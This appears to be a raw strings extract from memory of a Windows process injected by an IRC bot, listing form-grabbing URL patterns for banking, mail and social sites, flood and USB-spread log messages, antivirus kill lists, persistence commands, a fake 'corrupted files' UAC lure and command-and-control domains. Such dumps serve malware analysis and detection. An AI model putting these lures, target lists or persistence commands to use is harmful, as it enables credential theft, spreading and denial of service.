WindowsSecondaryDesktop

\charmap.exe

\Windows Media Player\wmprph.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

Aadvapi32.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

calc.exe_264:

.text

`.data

.rsrc

SHELL32.dll

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

GDI32.dll

USER32.dll

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

calc.pdb

j.OXO

_acmdln

RegCloseKey

RegOpenKeyExA

name="Microsoft.Windows.Shell.calc"

version="5.1.0.0"

Windows Shell

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

CalcMsgPumpWnd

The requested operation may take a very long time to complete.

Do you want to let the calculation continue, or stop the operation now?

Windows Calculator application file

5.1.2600.0 (xpclient.010817-1148)

CALC.EXE

Windows

Operating System

5.1.2600.0

Operation was canceled.-Calc does not have enough memory to continue.eThe requested function may take a very long time to complete.

Do you want to abort the operation now?

calc.hlp

Cannot open Clipboard.TThere is not enough memory for data.

calc.chm

calc.exe_264_rwx_000A0000_00002000:

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

459341432

z2r1l.exe

i4r7u.exe

kvlkc.exe

2urz4.exe

8qrie.exe

ljkq5.exe

geamk.exe

p53fi.exe

6dtxp.exe

4ldo5.exe

30rwn.exe

oylf1.exe

2sieq.exe

jzlkh.exe

1sjgz.exe

fkbpp.exe

3uwqk.exe

fwkpi.exe

yuwj4.exe

user32.dll

urlmon.dll

URLDownloadToFileA

wininet.dll

http://www.google.com

calc.exe_264_rwx_00970000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\calc.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\calc.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

calc.exe_264_rwx_00A00000_00027000:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

PSSVSSh

RPVSSh

PSSh(

PSSh#

PSSh'

PSSh&

PSSh*

9p.uV

calc.exe_264_rwx_00A28000_0006D000:

Opera/9.00 (Windows NT 5.1; U; en)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)

Opera 9.4 (Windows NT 6.1; U; en)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)

SbieDll.dll

Software\Classes\CLSID\%s\X

Software\Classes\CLSID\%s\X\%s

0xX

SB:0xX

G:%s_0xX_%c:%s_v1$

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u

IEXPLORE.EXE

IE.HTTP

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTPS

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

HTTP\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s

Psapi.dll

%s\%s

Software\Adobe\Acrobat Reader\%s\Privileged

mscoree.dll

HARDWARE\DESCRIPTION\System\CentralProcessor\%u

SOFTWARE\Microsoft\Windows NT\CurrentVersion

nspr4.dll

nss3.dll

Urlmon.dll

URLDownloadToFileW

Netapi32.dll

76487-640-1457236-23837

76487-337-8429955-22614

76487-644-3177037-23510

76497-640-6308873-23835

55274-640-2673064-23950

76487-640-8834005-23195

76487-640-0716662-23535

76487-644-8648466-23106

00426-293-8170032-85146

76487-341-5883812-22420

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup

{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}

snxhk.dll

comctl32.dll

ZwSetValueKey

ZwDeleteValueKey

SOFTWARE\%s

update.microsoft.com

microsoft.com

windowsupdate.microsoft.com

JOIN

PRIVMSG

.rdata

cmd_option.%s

/c %s

cmd.exe

msvcrt.dll

--x-x-x-xx

Content-Type: multipart/form-data; boundary=x-x-x-xx

Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"

%s?action=up&g=%s

xul.dll

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

?pid=%d

?page=%d

?id=%u

%s=%u&%s=%s

%s=%s&%s=%u

&%s=%s

&%s%u=

&%s%hu=

&%s=_%u

%d|%s|%s|%s

.info

httpget

GET /%s HTTP/1.1

Host: %s

Content-Length: %d

Accept: %s

Accept-Language: %s

Accept-Charset: %s

Accept-Encoding: %s

User-Agent: %s

Referer: %s

Connection: %s

http://

iexplore.exe

firefox.exe

tbb-firefox.exe

%s:%hu

windowsupdate

SSH2_MSG_KEXINIT

SSH2_MSG_DISCONNECT

SSH2_MSG_USERAUTH_SUCCESS

http://%s%s/image.php?id=%s

TaskDialogIndirect

http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535

ÐxX

ntdll.dll

kernel32.dll

secur32.dll

crypt32.dll

user32.dll

advapi32.dll

wininet.dll

shell32.dll

shlwapi.dll

ole32.dll

version.dll

sfc.dll

dnsapi.dll

ws2_32.dll

8"808]9|9

9%9 919<9

=(=/=6==={=

4 4?4^4}4

6o6g6r6w6

9 9$9(90949

.text

`.rdata

@.data

.rsrc

Invalid parameter passed to C runtime function.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

EnumDesktopWindows

SetWindowsHookExA

SetProcessWindowStation

SetWindowsHookW

UnregisterHotKey

ExitWindowsEx

GetAsyncKeyState

EnumWindows

GetKeyState

USER32.dll

SHELL32.dll

RegCloseKey

RegQueryInfoKeyA

RegOpenKeyExW

RegOpenKeyExA

RegCreateKeyW

RegCreateKeyA

ADVAPI32.dll

GDI32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

i%fOLK

>Z.DI

Q}.UbU

%S.Ny

J[ÿF

#Q.RP

[.ivH

|:v%X

ym.sg

X*.x.aVkyJ1

.Po7VE

M%Doz

,v.XS

Software\Classes\CLSID\%S

G:%S_0xX

chrome.exe

opera.exe

safari.exe

maxthon.exe

:Mozilla\Firefox\Profiles

cookies.sqlite

%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*

%s\winsxs\%s\comctl32.dll

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s

%s:*:Enabled

avcuf32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

prstrui.exe

Windows Defender

MpClient.dll

Windows Defender\MSASCui.exe

MpSvc.dll

msseces.exe

MsMpEng.exe

MSASCui.exe

MpAsDesc.dll

MsMpLics.dll

avgui.exe

avgidsagent.exe

avgwdsvc.exe

avgdiagex.exe

avgmfapx.exe

avgupd.exe

avgcfgex.exe

avgnt.exe

avguard.exe

avshadow.exe

avcenter.exe

update.dll

updaterc.dll

usrreq.exe

ccsvchst.exe

symerr.exe

NIS.exe

NAV.exe

navw32.exe

avastui.exe

AvastEmUpdate.exe

ashUpd.exe

WRSA.exe

zatray.exe

ForceField.exe

updating.dll

fshoster32.exe

fsaua.dll

PSUNMain.exe

PSUAService.exe

PSANHost.exe

PSUNScan.dll

epavjobs.exe

AVENGINE.exe

Upgrader.exe

adaware.exe

BullGuard.exe.manifest

BullGuardUpdate.exe

BullGuard.exe

BullGuardScanner.exe

BullGuardBhvScanner.exe

BullGuardUpdate2.exe

BgScan.exe

BgScanEngine.dll

.manifest

updater.exe

Backup\RSD\RSSetup\updater.exe

RsTray.exe

RavMonD.exe

RsMgrSvc.exe

rsmain.exe

RsScan.dll

RsTray.dll

mbamgui.exe

mbam.exe

pctsGui.exe

pctsAuxs.exe

pctsSvc.exe

Update.exe

UpdateHlpr.dll

Definitions\vcore.dll

sbamui.exe

SBAMTray.exe

updater_client_mod.dll

FProtTray.exe

FPWin.exe

scf.dat

ALUpdate.exe

update_tmp.exe

arcaclean.exe

BavUpdater.exe

rcfp.exe

CLPSLA.exe

op_mon.exe

niu.exe

K7TSUpdT.exe

sguardxup.exe

ccupdate.exe

caupdate.dll

a2guard.exe

a2start.exe

a2service.exe

AVKTray.exe

GDSC.exe

AVK.exe

GDFirewallTray.exe

Bka.exe

BLuPro.exe

BkavSystemServer.exe

BkavService.exe

LiveUpdate.dll

LiveConnect.dll

BaseFile\Bkav\LiveUpdate.dll

V3Lite.exe

ASDSvc.exe

autoup.exe

downloader.exe

%s.config

updatesrv.exe

updatemgr.dll

egui.exe

ekrn.exe

x86\ekrn.exe

uWinMgr.exe

coreServiceShell.exe

uiSeAgnt.exe

uiWatchDog.exe

plugins\plugUpdater.dll

UiFrmwrk\uiUpdateTray.exe

coreFrameworkHost.exe

mcagent.exe

McSvHost.exe

McUICnt.exe

McPvTray.exe

mcui_exe

mcpltui_exe

mcshell.exe

mcupdmgr.exe

mcupdate.exe

mcshield.exe

mcupdui.dll

McAPExe.exe

.config

Image File Execution Options\%s

SYSTEM\CurrentControlSet\services\%s

%c:\ntusbdriver.sys

%c:\*p.exe

%c:\%s

p.exe

%WinDir%\explorer.exe

/C start /d. %s&"%s"

%COMSPEC%

%WinDir%\system32\shell32.dll

%c:\%s.lnk

VisthAux.exe

explorer.exe

t.minecraft

Works! PID: %d, Name: %s

cmdvirth

%s%s\X

tcp://

svchost.exe

csrss.exe

lsass.exe

smss.exe

wscript.exe

cscript.exe

vbc.exe

rundll32.exe

regsvr32.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

winlogon.exe

services.exe

%s\x.lnk

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s

desktop.ini

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

wintrust.dll

chrome.dll

Applications\iexplore.exe\shell\open\command

%s_xx

x.zip

Navw32.exe

SysInspector.exe

avscan.exe

mfefire.exe

wuauclt.exe

WerFault.exe

lFileZilla\sitemanager.xml

port

Sites.dat

Quick.dat

%s\3\%s

%s\4\%s

spoolsv.exe

steam.exe

skype.exe

origin.exe

dwm.exe

tapi3.dll

/C copy "%s" "%s"

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

Windows Update Service

"%s" /%s

Software\Microsoft\Windows\CurrentVersion\RunOnce

/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST

schtasks.exe

/DELETE /TN "Windows Update Check - 0xX" /F

\Windows\Explorer.exe

Low_X

%s.manifest

PendingFileRenameOperations

%s\X

Windows\CurrentVersion\Run

CurrentVersion\Windows

Windows NT\CurrentVersion\Image File Execution Options\%s

Windows has encountered a corrupted folder on your hard drive

Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.

Corrupted folder: %s

Corrupted file count: %d

%s

/c start "" "%s" /%s "%s"

shell32,ShellExec_RunDLL "%s" /%s "%s"

You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.

Windows 3.1 Update Service

%s:Zone.Identifier

%s\X.pif

KERNEL32.DLL

KERNELBASE.DLL

kernelbase.dll

1.2.3.4532

YandexDiskStarter.exe

Yandex.Disk

notepad.exe_376:

.text

`.data

.rsrc

comdlg32.dll

SHELL32.dll

WINSPOOL.DRV

COMCTL32.dll

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

notepad.chm

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

notepad.pdb

t%SSh

_acmdln

RegCloseKey

RegCreateKeyW

RegOpenKeyExA

SetViewportExtEx

GetKeyboardLayout

name="Microsoft.Windows.Shell.notepad"

version="5.1.0.0"

Windows Shell

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

&*$#$$#$*

MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM

*.txt

/.SETUP

5.1.2600.5512 (xpsp.080413-2105)

NOTEPAD.EXE

Windows

Operating System

5.1.2600.5512

notepad.hlp

Text Documents (*.txt)

You cannot quit Windows because the Save As dialog

dialog box, and then try quitting Windows again.

Common Dialog error (0xx)

Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.

Not a valid file name.MCannot create the %% file.

Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.

Page %d

Ln %d, Col %d

notepad.exe_376_rwx_000A0000_00029000:

.text

`.data

.rsrc

@.reloc

*windows defender*

*windowsupdate*

*drweb*

dwwin.exe

kernel32.dll

iphlpapi.dll

GetExtendedTcpTable

GetOwnerModuleFromTcpEntry

%systemroot%

%programfiles%\Common Files\*\*.exe

%appdata%\Identities\*.exe

%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe

ole32.dll

/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"

/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe

%SystemRoot%\system32\SHELL32.dll

%s\c731200

%s\%s

%s\%s.lnk

Windows_Shared_Mutex_231_c000100

ntdll.dll

\ScreenSaverPro.scr

\temp.bin

user32.dll

advapi32.dll

shell32.dll

urlmon.dll

wininet.dll

gdi32.dll

rpcrt4.dll

netapi32.dll

*.exe

.gonewiththewings

*.gonewiththewings

WinExec

URLDownloadToFileA

http://www.google.com

\calc.exe

\Reader_sl.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

notepad.exe

\notepad.exe

\svchost.exe

WindowsId

Identities\%s

%s\%s\%s.exe

:Zone.Identifier

.quarantined

"%s" -shell

"%s" -bind

userinit.exe

explorer.exe

Windows critical error, require reboot

Windows Update

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

a.aiphon1egalaxyblack42.com

a.ajjjqws1fkxx42.com

a.adoyou1understandme42.com

a.amous1epadsafa42.com

a.acaraka1lagroup42.com

a.aire1bobohayawen42.com

a.ajhvdqw1ladies42.com

a.biphon2egalaxyblack42.com

a.bmous2epadsafa42.com

a.bcaraka2lagroup42.com

a.anabok1hasn1aser42.com

a.athemall1gonowhaha42.com

a.bdoyou2understandme42.com

a.bnabok2hasn1aser42.com

a.bjjjqws2fkxx42.com

a.bjhvdqw2ladies42.com

a.bthemall2gonowhaha42.com

a.bire2bobohayawen42.com

a.cdoyou3understandme42.com

a.cmous3epadsafa42.com

a.dmous4epadsafa42.com

a.ciphon3egalaxyblack42.com

a.cnabok3hasn1aser42.com

a.cire3bobohayawen42.com

a.cthemall3gonowhaha42.com

a.cjhvdqw3ladies42.com

a.cjjjqws3fkxx42.com

a.ccaraka3lagroup42.com

a.diphon4egalaxyblack42.com

a.ddoyou4understandme42.com

a.dnabok4hasn1aser42.com

a.dire4bobohayawen42.com

a.djjjqws4fkxx42.com

a.djhvdqw4ladies42.com

a.dthemall4gonowhaha42.com

a.edoyou5understandme42.com

a.dcaraka4lagroup42.com

a.emous5epadsafa42.com

a.ecaraka5lagroup42.com

a.eiphon5egalaxyblack42.com

a.enabok5hasn1aser42.com

a.eire5bobohayawen42.com

a.ejjjqws5fkxx42.com

a.ejhvdqw5ladies42.com

a.ethemall5gonowhaha42.com

a.roooggeyyy2.com

a.roooggeyyy3.com

a.roooggeyyy4.com

a.so1aa00.com

a.saao20000.com

GetProcessHeap

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyA

RegEnumKeyA

RegCreateKeyExA

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteExW

SHELL32.dll

SetTcpEntry

SHLWAPI.dll

RPCRT4.dll

NETAPI32.dll

DNSAPI.dll

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Software\WindowsId Manager Reader

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\RunOnce

WindowsMark

m1xg.org

mxxtxxt.biz

meob.me

%System%\notepad.exe

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0A

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

%s_%d

-%sMutex

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

